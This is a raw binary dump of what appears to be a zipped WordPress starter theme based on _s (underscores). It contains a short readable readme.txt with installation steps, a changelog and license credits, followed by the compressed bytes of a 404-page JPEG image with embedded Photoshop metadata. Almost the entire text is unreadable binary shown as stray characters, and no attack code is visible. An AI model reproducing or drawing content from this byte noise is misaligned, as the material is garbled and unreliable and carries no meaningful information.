O���~�6�q�����`Ϝ��L�7��l�]˗3n��Tz�߉Q�X`��Fߤ�������҉�W�*�ľ��oӊ,�5��B���%��5r�%r�D�Q))�S��E��;�Ê�Ej4��J�T}<|b2���o�|�`����#���#(!�#;[���z,R邟@�7�Jӻ�B�D:�2�@�{SN��}��#������=�`	���2��\S��{_h�'�'� �� �8�8�8�8���8�|F�ό56/��#ыQn<�RX}x"�Sz
0a���eˋt��o0`{A�|�4�=J�b#���*�*'�C/����i�t�z:��F�Q��&/Է�y �O�g��0a���X]�8�}��Cd:�?͋�o�;5_Y�4f���oI�Cc�������WZ�k3<�f�t`���yb�F|?�B1Y�@�y���u.G�!П5��Y�8�/��ܱUt���c��cEɹ[���!t�y�J0E�q[=9�l���V?���0b?����v�:�ח����?�)�W�K̯x?��\�e{�e;�=�^�vP��*��Ox�2��{�<�w��J��}#���O���B+Mn|?Nc{n�����@�a��_I�O9�~������C��y��������)��1��6�����b"Z��!��O��b#�����:���ځk�8�FТ�<`��2�F�̸��O��`��)�8�r��)�����ન_��7Q
T}�7P�h�O��Z���:%�Qe�e|`�iin�?OR�J�*T�R�J�*T�R�J�*T�R�J�*T�R�|S��*Kk�~'o�FƊq��'��!>o��]����2���&G� YF�`V6��.\���V+v�7f�\�j���}���F>�9!A�:|�����:%�)G�����3���O����O���O����O��A�O�I� �R|Ϭ��e��aG�)���[2�.%�o�|���t%9Y�P�Y��f��3�v�M� �v��P�Z�����7��O9�S-����ӠnPB*L�%��Y�Z����F��ƿП�	q}!	(�Ք�~a�.5-�=F�N��@�j���W�ύB�A�꿏߼_d��c�_h��D�Y.3�����"ֽb5��L�ѷ���뮁�~ �ˊ��5�ź`y"�te�.�T=)2n��=�dl�SO��ON?�K2�>���798�w��Ҿ��&�F�+YWs��������|�a��w�C�B\�C-����k���� ��?�5��[��L��2�2ES�R�֦�X���G�1��X|�����
~3ױ/�a*�f�[�]�um�:��"�
��&�~���[�|@'jR@2�Grj8�z��2�t=���H��Ԩ=}�k��o�ޕ�˛�F���*a�n��)̧�OBoN��,`�0���<�t�}��O7�<�t�}�����
���B���)Pr����)�_�T�NzWA����0􆖧�:S��I5s,儕VD~Z���$	��ͻ8j�y�,���l�Pp�iPh�����P�� �|6���D��j���4������#�d�]W�5*�������o���ш��g7�?�Џ�TL���_�Q��B�b�l�W��<K%��e���\�K�Jw>���_w�/��C�A�>��
�;�F��W+�
f�q�{
�_�x�E+I��;���,#\����$4�,�"P�A+�S����늘����R�~��WF ���wS�<ȷ�E4��1��6�EE
����(n ��)�W���a؈s�U<_�?����PK�8FZ�� �DD
readme.txtnu�[���=== _s ===

Contributors: automattic
Tags: custom-background, custom-logo, custom-menu, featured-images, threaded-comments, translation-ready

Requires at least: 4.5
Tested up to: 4.8
Stable tag: 1.0.0
License: GNU General Public License v2 or later
License URI: LICENSE

A starter theme called _s, or underscores.

== Description ==

Hi. I'm a starter theme called _s, or underscores, if you like. I'm a theme meant for hacking so don't use me as a Parent Theme. Instead try turning me into the next, most awesome, WordPress theme out there. That's what I'm here for.

== Installation ==

1. In your admin panel, go to Appearance > Themes and click the Add New button.
2. Click Upload Theme and Choose File, then select the theme's .zip file. Click Install Now.
3. Click Activate to use your new theme right away.

== Frequently Asked Questions ==

= Does this theme support any plugins? =

_s includes support for Infinite Scroll in Jetpack.

== Changelog ==

= 1.0 - May 12 2015 =
* Initial release

== Credits ==

* Based on Underscores https://underscores.me/, (C) 2012-2017 Automattic, Inc., [GPLv2 or later](https://www.gnu.org/licenses/gpl-2.0.html)
* normalize.css https://necolas.github.io/normalize.css/, (C) 2012-2016 Nicolas Gallagher and Jonathan Neal, [MIT](https://opensource.org/licenses/MIT)
PK�8FZo(i�i�images/bg-404.jpgnu�[������ExifII*��Ducky6��/http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2018 (Windows)" xmpMM:InstanceID="xmp.iid:A6280418D30311EAB48C9CC3A986891E" xmpMM:DocumentID="xmp.did:A6280419D30311EAB48C9CC3A986891E"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A6280416D30311EAB48C9CC3A986891E" stRef:documentID="xmp.did:A6280417D30311EAB48C9CC3A986891E"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>��Adobed����		  ##########
#################################################�������!1AQa"2q��B#3���R��b�r�C$�4����S�!1AQa"q2������?�:���AP
��`0��P�@�4=�L5jᨍ1[H�{@{@{H)D)��
"*��	` ��0%���4�
U0	�����K9e ��.P9rg�V������#��}H�_M��s��dt2��h!�)� 6� 
:���@2���0�O6z�cEC&7%I��K�V����&E�����<��bc�?��	%��=��sMW��_��y|��\�[qyc�a�m?��C�V�9�1s1�%3�0�R�#��VgW�����-�RI4Tg<x�����VQ�������޵_TYK˽J-&�Sѭ
0` @@&�@�` `{|O҉��ӛ����@&Eg"fuH�D
C��` 2��"ר
@0
�ާg�� `0�
`0(�����h��4=�S�Q t
t��0R
�0P
�T���A
P)�@�
€��)��X��z�X��3� �:��=Xz2�/'�0�����x�m�dL��0��U�@@0�@4���€P�
@0%��zw"�@���A��N�eI�cW?��s�K��m�)�Û�[7�>ic��v���H�/ȅ�,RmY���j��eȪ��I�Ok��TO�Z�2�&�X����zq�`É��iG�yۯ�o�JsT��Q���Z��-���J1�p�<U��-kږ3�/��MR}��	���r�X�J��%�S�v�O$��N:�mq~�"p�[\��Ii��0��&O�q���?*�K���cU�
���<s�J9b�'�g�cLh����*��@
@��(����7I�(`0Ȭ�A����i�h��(`0P��kP(�� ��p�@�L��S�45jⶀ��i4B��@:P@P\B���@*p)E�R�&Kb�i�X��D.+�]�㟑���J��T0@���@����
�` %���&�3�Hf6P92�=X&��yY?U�w|f��}/�κGdt2����@ �L��
��`)��!�"�L4��:V�@�7'��˒iW��5\�帘S�r-��2&��U��Ǘ�ۂ1p��y_Y����՗�93eyrd�T�G蝋!�s�{��'����.	\�Dk�J���>�\�M���]�U]I���"�r������~��I�q�uMd��Ő�W�\�*JSi�Rm}̟X����t���"��_ԗ��:#��։.���>���\�e�D��Be]����.�st����c�k�|�|Ԧ5�{Ui�D0k���Il����o���'�QrI�ի��V��ro��d�mx7�k�5�|Q��%Zh��R�F)�%vIJ��*��{��R` @$	}	Q��M8�à耀(`0dTH�	@�%F�DP�`0���B-j"��c��`0�@�`2@���R���(�LR���Q"��t��:@@U@P.!V��A��Q5*@td4�$���Lh���W�
1k
�X�1J)����U�%+�4ɀ�
���`0*!Z"
���z�X 2��l�rd<z��̣�����tJ��~�:�vD�@4` B @4@0
�`04�����?�,�VzEx�V2�rb���˺����k��|�N<c�gU��u_�W_'�&|�Rq��ZI��/֚�r��+2r�V�����o���5���R�;�$\rZ���P�*�Y7N�	E��K -c��%U�@pYW��T�$�%���R��F�����N�L8G�9U;]hke&�յUW�$c�&���gª�qt��P�j�5���k�#���D͋��<�e��9l[�N��KV��\v���KZ^j���bY��$Wi6�~��סS�'/r4�dTk�rԆ:x���oK�Yѐ��-���j��S�ҫ��`�t�
=�7�|za�t@@���L��a %j�*6��`cS!��C�����0�N�5�MhUP��IT���V�B�@���
(*�
��*����L�k��.8��蚸�aAqK!�PH*��
�(�����9��2`0�(����@,�0%����@c0�l�rd1j�	�ʯ+'�H2��Q*��C�j:�F���
E �����
�4�t�@0��|�&3dᓎ�D��N�5/���i�]�-�kѯ�Iו�,��95v�T��Έ�n�2_r�~(���x��[�}��	Ʒy?�o�Q�d�7�I���P��_�=
�����t��g(y]�0֞�j���>��f�-%`/�JJ�f�P�Y'�Q�]J:T��l�qnηUDWN)�iKj�5���.X�%�ی�}�k����Z����F�^5f�8Ҏ��̋|~,��e����%���8=�ܚZ�R��I��¯"�X�}>������o��mT�+�'��O�,�z4f�w�HF���&���m�ؐ���U�%%���0�8��;W����@ �Q�q�M��
Έ@��@&ED�0��J�
bTk-0�����E-X�͎�9��H�{F��i��j�D��Um!�h\=����$i	l�T�:�T��@*P
�T���I�K�4Z�Ƙ�8(M\Z�d�R�(t��0
�`L�,�y�VVAC��`L@2��\@�
��� %����@c"+�)G&MH3�Ԩy4eW���$w�f��_I��a�뉖�AH���
(�(�(�P��@�
@�o���ݲ�9\8�ʝ}���'K�������K֕Ut���Ϗl��ޏ��i��nqt�&�\�*�i��߀�S�X,���N�+|\ۤҿ�w��p{��G��p���J�th�<��K��%أ�$e��ف�eAV�Ҥ�ָ�DӤ�2*�q�E�?�}P�g�NX����TQx�\~�2]"�Ǔz�m�Y�У	Y�szmt"��ƚ�������F�2^��me�ີ��=f�"nZ��(�o���R���F=xi��2R�<��lj��ں.���1�gnxrm�֪��:u�7�u��K~6�RV�fvb��#�X�~v6��Ik�2�CH�1ݖ��"�J5ё��<b��T�@��9��-*n�Ӻ5*X���L���(����o�L6:  e� �Z�+P5�Q�@�P�`0	��=L���P�`_�mgmy��X�
@i�P&��hj#U[F���a��:��P
�Q
���ԡ0
�T�E@*T�5T�ɍ�Ț��qƘ��&�4X� b�UmEt��`D�,�y�VVAC
a2�@2� P@K)hL	`g"�Q���l�rd1u��f��r~��/C�:_G�����&ZP�h��P��P����(P@"� ��W�x�sra	G��
1��s�\���[MJ�����6?������m5'D���hɕ^/;�\��ɑ��9C�ƽ/��G3��䍡_���(֋"r������J�-�j�]|
�IA8�=�k��@L'<Nαvi��f�de�Ay�/X��N<ɭ�����Vq���B�f�����b�J�n�8��j�MJ/�P��j�V�Dŕ߃6<�x�ʋE�k����(f���Q�9��)�6�J�%��[�ۙo��J��1�=�k˕bu�٤Ƒбcʼ�K�p�2j�G����&�/���c�Ͷ|�U�����o���/.^L2�~��&�]]�iuF�4`ςmK/�]'�iR�(:,�ҺQՓm�Ƣ����	�5Ճ��IK�ҕ_i�V����"��IU�n�_�
��q��2��	]�Ϻd�;p|��F2R�Қ2�͎�]QY°�^e�%�B:����0��(`0Ȩ��	Z��J��"���CVAQՁE�@0S
?>�o\���0�H�ѫ�����0��TB��FM�
�:�TFP��,2d���j���}Z.:�U���X�\R��@::�`0O��G��ed0���(d@RD�A(��� ɄC(�DVr͔L�F.�<��j#'�A���B,}��șS0`@@0P�P	0@@�@���'Zm��]՗�(��&��:��m^�:��R�pKj~�~�Y/B{"%]ۢ�E�[:D�Y5M�F���b�A����Gv)���ѧс�X�?*ڟG�_���My��f����TL�J�Q>���	Nꖟ�_�
8���+?�{2��BQ���}�BN2J-�Ƚ/�o$�(�Z���Mn�Ҧ�+/
h� 䒋�=�}Dj���^h��]���g�#�7����v~͘��\~�Exپ����R�
�I'N����%�Ʋ���4e��w�9���R�K�ʂp�X叅�N�!�b��H��e8��M�_�XJ�&eW���N���(����S�[����}W�_Ę<�UV|��ڜ]����	�.L^�5h�&���,��⮽�%�r[d�]��M�ܗ(Zt�rN�&+i��'�M�wTR�g��"�o����+crtu��G�>69l�?-��5�.�+
�F쨊��@	I��/����GN�M �@��@�9XKP%j�*5��03���RՔP�6�s:Q`E@*P���Rh�[ed,rcE�d���}���q���h�"j����X�U(�C�@:P�0�`D�,�y�VVAC
a)�0����`0)�
`0!³����eȃ9c"+�(��]@2zYG���"��3�>���Q�*�)�0SA@CH(0� "���h>^o�L�[���Z�>���{x��1�-�}�]RŎ9J[�I?�J��>�CI��r��T��Ԣ��Ptr�p�b��S�U�QGF,�Z�Ҥ�Z�)�XM��o��R��ƒi�m8�ڏA�e�$W��7�u�%�i����U|ڽ?gf]Lr�8}JW�%\���q��@)Jˤ��ry��I6�׍5@ÎJ��YSs�����zJ�W�2�G,ی�\�����o^��.7�*�&�?��<�B˂sR�v�R��Q�嚸�y��'�G�0�T���G,�;K4}����������l��ӥ�ZP_)���?�hP�J�M��iw����rۏsw��U{�¬u��,X�(��5<�h��H��Y����8ݩ:�0֜~~\s������������f�r0{Nm�H�mc/���3��ˌ�.D�/#�t�m_�3�]z|_�|Y�sBX�5d�T��=&k،�8)A�2JQ~��*���  
�?���c�8f�4�!�P�`0 �DV��X�E��L�!�e�•�P@@��Q��91�had�dZ�ɫ�X�E�,���( +jР��`0	���y��?�c ��0�)���`\@�0���� Ł,��D�+�͔L�N.�<��Q�O�"��1hE}
���hE2��`0S�B
`����0
�`0<������Oڎ9)f��r5U{��ٳp�`ɍB~�<��ToMњ�e���r��v���H��N��v]���T��E�����oQ&�^�hg��rpOT��`��e'Wͪ���Њ����rw�*�1�,�$�����~��9�xy-��/����F1��X�%����t�L���s�����	Xڍh�
P��To���[T�iQ���\L}�r���G�z���x�-���3�����]%o�|I��,�GGg��>���^jt��Jx�9�3�c,Z�;T��qǞ��+El������)c��b��ӽB�r��wڂ!A�,���H�S��Qݹ=ԓV~$�������TX��n�?�u�q�q���y(�q��b��[H��	�����s�obX���{��[�RIB�=�h���kq8��.n�s����^Ĵ}�ɵ[G���D�Ҭ���)j�* @�K�J=�>�t����@��@&A"���%���Th���`'���B-jQ@0�+PT�
�@C��I��ɓLZ㱫�\bj�Z.:&���Ŭh*�j���P�`��`0&Z
<�،�C
aS�0�@�h��� 
	�,��0%���������ː	ţ(2�XD�r+/O�:c�t0�u")� Sa@B`0����A�aR�!��B�q�f�푓i�|+����Y3�7EKS�4�t��ٖ
 �`��xg�
������!**W�?�#Y`���ut�U�\
,n��RKE&�0ᙷX/mST����썧%)5�(�������
�H+�m�׈��ϋ$�b���5q�82��i�W��k-���
?�I��'ƣ��Z�.�V~ēV�g�i�B�ܧU�Ʀ.��eҳ�>�{��T����EE�8����,�߶�8��m�R�8����[��
��y<���%,J��]sR�c�Xc�R�8��WX�Ѧ\�R�-����=�� �'��e���Ս\m��9lU�NM�Y2,z��N�Tޣ�_�W��1�c�͊Nny�^�����a�cβc¨��Qn���9�ny}1��?q�����f��i��p{�I/º#Q��d���#�_RQ�a�#�,֦����`0�"DV��X�-0�<}HE�R�@0(�W1P���CX�ƋX$Ʈ.<vO��W��CW��b�4J(`tР�@0�vOԐ��@
a(�0�@2��
� (`K)hL	`g"�Uc"#� W.@'P��Q�O�"��>3��}�Zu�ʘ@0��@0��C�� 
!���Ө��+9`�S���?.�+q�c���7F�he�7v�Q.)��є-�)Z
��O�T5j�@��7j��7��[�k�U���[7��ՑKYR�Wi[�cW��<h�I7�D���D���_��e����ƗN^W���Ô-J��W�	��?Ë�/z�W����E���)*�:�Xj�굷`9��UZ�֝Ʀ9�RUն4�Y8�}պWR�X���J�Z])�Ԭ؜����$��q^�ѿ$f��;�)m���)��&�y$��k��DVR�ɶ�Z�?�,k"ݍh���~�k����jk.�%1sT��U�b���!<�R�S���wfkqx��%�{�1E8å{nd�>̲a�LnK�������}<
&5ŏ����)�$��KO&E�S�7a�ؠ��<�m���f:j=�.Y��G��›����32�;kT�sq��@&\~�����GNYjm����`0Ȩ���Xj�-0�X���E�`|:�&5�i1>�-q��,��X�U("�0:PB�@
�`��OAG�������0�@0���2�����
��R�������@sd
��@��2�YG�?\�����U�8:i��d	��h���@0	��a@C
a
�'�uҏ��O/��X�q����>52��)�4�(��V��9��zF�*�l���.�W�R������h��8´N�~q��e8�*�x���V.6緫VCVG^>*�}U�f��i+�W���UY*vІ:!�iK�T+x�J��4�A04��W��@��4���꫰�4K��_d�Kte���'v*8��|(
�yP����H�\N�vw+)qJ��uk�C�owI%XIi	��7����;�c�&��z�mc:�TxNQutj�+�kQ���7&זJ�R����Ofㅷ�5��(VQk�^��=~,��k˹~d��KV�0�T"����g�Mb�T��7��ȏ��f��9�S�H�Jjx�ׯ�92d�T�c]�Z5u�s��I�~�J��P��:U
�ˆ��%J�0�ז��
�@0	�g"+j�@�F��C��O@#R
E�`|��&
چ@
�P�`0��`K�Q�d�F"P��@@�
S 
�qD�� ��r�X��@g 1�6P�L�t`},�ǟ�Ee�|_C+C����KB)��
`4�@0	��`4���RS���q�T,�Gm��]���j>c&I����X�*�J"jIT�
1i���E�\{���պ>�Ց�.:�;tu�K[�݇iZW��jGv=H�;#��@(U�i�b��
)$�AP"��m�L]5�&��T.&�ɉuşi�����iV�S��J�����+)�p���ѕ�C�yTݶ�/����e)�uJ:>��ԑ�=���[P��/����>z5���{\�!������H�\�2�Jqn�n��u,+���43�^x�$�MVc���RO};��;I/44�X���B-�nH�]c�6�5�ˇ�)���8㌜_�����:�J�>#4�h��i��/Ɨ_���o��6X�.ԜR�d�[6�@K
!�ԕ+���G^Xjh0 (�)��`&A���e��hj�)0�!Ԃ�E 6P��`0-vO[�����`0�h
S��A	aY�B�!�g 3��l���oK*<���Tz���X����D)���`0�0����h@x?+��)�K4�V=��IW��ԍG�O��i�K�ݪr�[+w}J���u�J-cm%JVGF;oq-nr��m���^�[�T!N��EtB={��-�
�H�6H#H���B7��kE�j�V�M-���j!K���Lvv��v
���"���q���V�~&�6
��n��I>��R�.�br�OO�r�lO���vi:*�)���VF܎<���M'Z���
��r��aM=���]��Ԍ���AO.7�ܧ��F⿩��e.4_�F)y��$��E����Z�NK��r9�n��h�>9�����tI�[�NM���0u�7L��Vۼ
2�+œޛ�����T1ז����<��R����U����D0z�)^�J:��SA�@@0�`"���V�k�PE"����D)H������`0	������b!0��`0* h�� @&R���H�R� �0�Y�,�ȟ�_R���3�������N�E0 ��0�t��hE�`�;�#���?w-?��~�5��������7f���j��+��ܟ�_Ԫ1�~Uz]�Gv3�d���Ә�lj.�#M�:�tE��lAj�5�x�Th���Ш�**���ҸE�`3k��U.���b�[%X����ͨ�ܑls�SX���������j�q�p��ys�#�.K��f��G_'J%'H�sC|$��8�9�%�$}ܐ�չI���tDž���Ҝrm֍�>ǩ����q�9Yg�"�r79��es�iO"�%G͒2�W���̸���\�R�`��,����T����狓���Z���*���7c�Մ2g�u�ƫ�2t�|AZr%6�I*�.��5���j���2)p�O�\���͹�@A,�!R�|>�t��40���P�D"+j�@� j��P�`0�� )04P���2Дy�=lD"���`0(`T@�PAH��@d��r)�����\�tf�2��K�/�Yz�����`�e��DS @R(`0��2��(`099�����J5�8=�Iꪺ
y������9:�֞ƥ|�'Xe�f�4�.�҄j5��
�ɗ�7�����dž+�V���9�2�6���ܣxЂ�kT@�kJ6�p��TkTi^�E�TJ�kT*%�tz�a���PX�~O�*2�x����u�<T�x�z|
ҖG]�o��4����K�ɏI�)˻�2ɩiq��r�g�pn-$��j�t�T���y#�y����WzX�9���Z��A;����}MH�z�x�|8g'��N:ѯ,W�3+Lxy$���L��q�����K���My��rx2nW£<R����#e?kyM����DW����c¢�b�&������_O�X��G��{3
�:9�P���J��zQ�2��`@P€�(��(D"+j@���
QP�=�Z���
��0��`0&Z�;'���P�`0�!��`0
T�02��b�"@g 1��H92<:�za^D�R������}����")��)0�����H�Ѓ�r�C*TUQ�K���o���JqZβo�����w%�t��Zr�eh��F���E\@�/�F��F�aEԨ�.�%EŰ��E'_�E��E������N5�� �d����ϱ+q�|�T��J�ɐw|w�a���������yPR��"k$�������׎�	aR�f���_N�G.��&E�~T��KYSW�EF�lJY�
q�[W��w���������yr��.�Ɵ�в%�7��{�����J�@�xW��IU9O��^تW�&����~�4��x�Ji�ZiJ}�������81C�(��ꜻ.��
k��݆3�$��)�a, 1��+���GH�SA�@
��D��e���F�DT2���OFpЂ��������(d� `���h�G���!�a@C(��`S��$�,��,dH�)�r�(��@�JoK,D�R�����#5c�0t2ӥ@
@0��`0	��E 
0��ő��ύ�;b����s|��Ƙ�Ɣ�R9�F��24疿�UMn����H#X�X�E/�Th�N�E��KP����QqEE��x:TnD+�ec�W��[�w�2ۗ�UW�5ROZ>����<��*-�(����*�r>;�h�/+z��D��$JQR��Ĥ�-�{V���}���<��=�d,��+)�����!�T���g���a�8�J�F-��o�e�7
d���9ƲY �ڮ���������u�$����B�;�ʆtԥ)�*�Oj�QH��%l����$���օ+���GNXhh0 (a@!���
H�X�)-B6�F�������8hAh��
� e�%t�l�	0� (d(a@ 
a��Eh��XO@2X 2�ȃ� �x}%7��"^�}J����{�4FZt�)��@4�@�`4@P�kP>�4S��$��t�O����J�K�I���ڝ��`���T��� \kP�c�EŁ�@��*6�ѕ*�J�E�0��*.(
QWM���T�ՑYe��۪"��D����]�b#Q�e��Δ��cS~-�_�~]Ķ�I4���_�#ȕ1勔w�ɩ/ڦ�قY2�l�f��/V�[��k�'��ΟȀ��͗$�����i����n��"�]�~��N%ƅ��ܥ�j�� �|�O3uc�P��Dˉ�3�:S}ZZ�� ������'���ڬr�^ە	��@"���zؽ(�hP� (a@ 
(�"�*�z�Ij�J4EC(`0-�B�
04P0�`0
Z2Q��ȑ�(dC �C
aP*)�4�U0B
@K)�L	`f��@e"\�r���(Y�,�Ȗ��V^��h���e�B"�
�L` �`4A(���
_���1���3Z���Ȟ��rw��j��+9+v*�h�x֡V���4��F�$��?qQqA�E�2���F�T*/�
w�
)�@��m�&9m�1^�BQ��o,�jk�F[qs#���Pp~1+5|v�Ce���ӱ��^o���S˹I��K�/�(b��M~'�[t��O����Z�1�[ɖ}d�� 9���d�|�$�7�&җ�p;q���}Ko�)U�\W6P��$W�ے��]�#���a���M��5���X���ypo����ڷ3kQ�|lr�����q��c{YP�
� �DJW��Ҏ�����@P€@0�D�U�ԊKP6�Q�*(���`L�`D4"Š�P�`|�@@@0z�7'�H��C
��aT�"�P2"�Q�H���S�������D������Q9�,�Ȗ��V^��h������Q҈��0�aB�
�h�P �����1��2Ws�r�1]9o������w
�M։N��U@t�U}�ٔo;�oTj�F��
�*Ti
�H#J��
v ��m]����FR�֋�ƥ|�ȹGr�{uk��!G^x���>i�EE��J����J��)�hI��_5䴲�>Y�n�ئ��P}>ޠqϑ�| �WI��ث/������ȖW芬kѵJ���V~:��
�1zɵFjD����Tq���?�]-��ee��a��?6����J:���[�~~����r�0�x�Q��CDt喅@P@
aP@�@0�A"�z�Ij�*4EC(`0	��ǡ�(`0>h� `0��`0�Q��Ff	4�@0P��
a�D*����S���r9����Aː��Q9��Ȗ��V^��h��{�L��DP��@0�H!��A@� �A-�$�gii�l|is7϶�W�K��h�t���2�S����� nWEUF�cw����$��Q��E]u+%��E7+��-ViW�1�>N>�T�������J��R�B�
kr�EKx�@]���T�ER�c�ǿ4��V>O���92QVS�[֎���i�b��q۹F��DTL;�M�J���"��\f�W�%H��_��y|�y��B}�а7𰌱�oV�&�-^y׹�a�IQ.䎗Ǧ�>K�������"ؕ>������X�w�5��o�sK��0��SU�,ib�I'z�����+�Až/�D����:r�f�@
aP@0S���(D#5X��@�%F�����3ѐD4ր2��`0��`0�Q��Ff"JC��`0�0��D*�B E�XO@2`K$R)r�� ��,��R���R���3Df�{�L��Z0�A(@0�H"�L�h!�P(��?�Q�`�D�3�F���\�y9$��S�w�Y�VIՕ�{��N�xm@U�U�W��ʊN+���7�~d�Qv^%f�;��+[v��-~��k�_'��׶�V��"�}����O|�����T�+�I_z��:�����ۥ�st�i4�0�;1�Ě�e������Y�-��o�Ѧ;�s��X�h�K���y�8�Y�L���R�3^P<O��&Ւ��{�u?���d��Y'�O~Hyb��,T^,mz��I��B��2~��G�^[�ȱO�io����F�~Ҕ��n��\r�Q���J͌��,S����5�>[�8��eY1�-�x�k��_����J��/������4�
A�xU�Z#�)Vi0�!€�((�A2�XR��m�DQE@�����"h��(����`P0�%n_ԑ"$�`0@�S�����@��+)�@K$R)ː��'P+��s�J���V^��h����e�B a@��@4�L�C0�@G&pǂy2:F)ղU���|���MJ�t��}]��y��Fˇپ.J��ߢ&/������v1�[Fm:T��2�V�ڭ��J�pl�I�J������,sbɒK$�*Ev�c�':~Y;�R�o'v�2���������'�w�Ţ'�~����~�����U�ư�����'�~���N�K��ؚ���%Z�U�@:��.�ӌd�n�t�[��b�ک�K���NI-ν�V,tE�j"ӢoK�20Y=�U��jEqGd%8�Jɷ�o�٦�hA'<�iI�R=�jƝ/O�5Q��#eȎ�4�ꗕ}��e����X�j	���O~&��?����q�&��ӷ7+����|�㭚�1Ϸ_���j��o�L	���Q(�a��3Vh@P€@0�(���(D#5X�B�uh�"�
/K!� ��
04PP0�`1G���$f"M��`���������) Ȭ��0�aQ 2�FR
��Aː
��(�G��y������{C-:Q�h@0X`0S��aAPB���<�b���Oq_�K��rz���Z����:���e��@k�i*^��J���}]�T͎��1���iۆjQ ���!Yύ�c��h�J0�,�J�#�|����
}Y��˒n�h}Mw`�ɒ�9S�U�\8��Sۗ����j����Wە:ڿɓ
a,�U�M�K���z3]���t5o�R�4ʒ�qr��8�ժU�¸���o��:��R��r{��u?̮�w�Z
��N��jY[�0�s7L���o��–8��'&�E���:��a�*���57g���}K:N�.f5
ˤ�S7��3��k�9]4t9�n���G�KW�:>zY����?��Q�CC�f�����0�( aPP�"Fj�aJ:��J�Q@g�`L=$��04P0P0��`&(�~�3���`0�
b��@&SЃ,"$R)�r�� ��r=/�Q�~Ҳ��7Dec���N�@�`�@& C@0@0>{�W
g�2_�F׻�ؕ���ZY�2�^(���r��I�djN�.�O,��d�c:��I�4\5�>U4u]�cR����W��v:=�SJŌ�e�W���J��u�rI��\���y;�ճI����`�e���dwq�q��'GO5+B�k7�^���嗶���9k�ZȞWcI��8��r�+EGn�%֤�˛��d��1�������C��Q�8��
��FY
v�B��4�o.VV��0�(�N�%~�(�^�p�7JQj�tq���qj����_p�_������)��+r�x_-��<��ъ�Zo���ܕ���c��T�D��g�_G�{�x�:ǚx��÷>|�t$�]{��Y�x�� Pa��(�!��3Vh@P€@0�((�A2�b�Q�
�Th��(`0?Kc� ���������(�`0�v�fb �`0�������@�OBX�����@r�
��b��K(�z��e�|n��ǻ�����`@
��� ��R�0@:4E0�
'.e�٪����^��RT��軣׊�?{.�mF��sw�^m���Ō��d���SrV/Q��ۊ�^�����\7�q4�h��ZYֳX�uC5��>-�O�eD�}:r��v���Ւ>Z�"���q���Ե.���,����Ӫ�ͤ���T'	)-U~����-x�~S�c����+*V�؟�k�e(rg�8cISzJ�}L^�ێ3ۻ���N<a���(�[�M�rZ��,1�;��H����鏅���TTm
���3˶����J*TVZE0䔔%�:S������J��L�A��%e�Xԯ#��9cUꭑ5�<�g²KML��ϧ
���j�7������t��I6���[8�W�Ֆ3��Y^baH���+�(���3Vh@P€@0�((�)�"�D��E(�Q�J�QEg�`L}$U-C��@0�
��~�fb3E���`0@T@� P
L#)�A�X 2�VS�(��^�3�zG���+/s�tFU��2Ӣ$� � (
a����P�P@�P*�G������+֯O���?7��'$���;ntM����[G��˃,i�4b�V���_N�χ�R1Rn?ڿ����"3�qoҙ�[�x�7YK�he�{	�yJ�u�W^}>����k�]��U(ZÏ��[i�rx�ptW���2^4h��uuIѻT+�5}�KkOKhƏK�5��[�_��Ա֥)$���iQE)�
�Ł�oƑ�H#X�V9Ӣ���'��4����T��"�(IF��ͯ�ҥGF�����i�S�5�y����2�eZ���|��nf���z8�_��,�ȴ�v$o����2{���ક��s2k��1�{��/�v�s&����(���3Th@P€@0�((@*�H�LY��D��P�`0&~�A1�Re��@0@0b�??�30f��(`0P2�@0����B&�� Ł,��f͐\�V/H�=��_iY{��2��a2ӥ0�`@@�(�� 
h#�������n����d�[��a���U��W~�.�0�2E�v��LC���*�8[���S�6B�Xچ]c�pI]\�s���J�,�O�1es���J�ם���ր��=FV�V�����A��X��BVʟg�C�**1��+X�ˣ�Z�z*5]�F���M���r��]�[�������ү���
+��H����TN�J�.�"��r�V�:�nzp�2b��$�WsW�\�.Lb���{#2k�����x��/�R�3��o���y��/<�d�!"~�dz�u�����i�HB
L@x?P�zQ���4 (a@ 
@ @�$ecE(�%F�����3�Q1�R�!�04�`0��`&(��3���`���`T@� PR@K �Z� 3��+�!.N�^?IF\�K(������#5c��e�J ` ��B
�!��`0@
�)�(a^O�5���{�F;o���Ê��`��]<x֑V�ƍ�0i��"�.=$�l�k�0$���ʶL2MT��D�ER��r�wh�2x���4�K�x�:��J4���:$TZw�4�_�IںӰG,�U�^�.�P��ueU����O5���i��E��m-ZtDV�,�^M���<NG5R�&�.�����7�ǩ�\�K�\_{*�H�Ka�Y�q,8{N�	N���Rd`�BQ�GC�f�����0�( aPP0�U"����:�k�DTPC����IB^���e��@0�����������P�d� e�ED
b �A,��0%����AYH\�H9g���(ˑ�eR��+/w㕑��s	��@�`0���� "����P��q/��7�dU�Q��:~~�8�U�oAS��@�*]��Z���=�Q�q�^�44�h�ʩ��-���s�j1tu�E*Yw"�+��"�t���Qi}��-k�
N��u��Z����*�/um*VYGm}Z׸P�eI'Kҫ�a|���8����/-5c�>y��=���G?U�M�Yfy$��u��3$�J�MJ���������N�Wرϻ�����+�B�! /��ю�Xʊ (a@ 
@ @�$f�Ő(�%F�����3�Q+�Q�!�0��@0�
��~�f`�T0@@�`2����
�Q �%U��L�XVS��D0"@g"+)r� ���Q�'��W��K�{��D��-:@�hP0(*@2��€�����?�_���|{|�k��rzZl�KZ?�+9J�"�+G�Q���Y��,��x񷁸�u�J�h�W�E\	�܄���f��u����V�5M_���p4���VZF?x���o��
T���RqZ��%<{�I4��J3[��T���u��m�7��]�.��OUz/
@qosM׵��ac�2���]�GL[�du�Ճlq���j����W�$��m��c��?DVH �(�#��2���
P�ER ��1du(�%F�����3Д%�
k@�P�` 4������f`�P�(dPQX�T @ �K
�z�XFr
�DL\�sO���Q�'�ʕ�R����茬{XL��@2���a�@@@�h��0���`0o���"�����/�����g��]U[��	KoՅ>,L����վ�J��.�7K���qߕv]
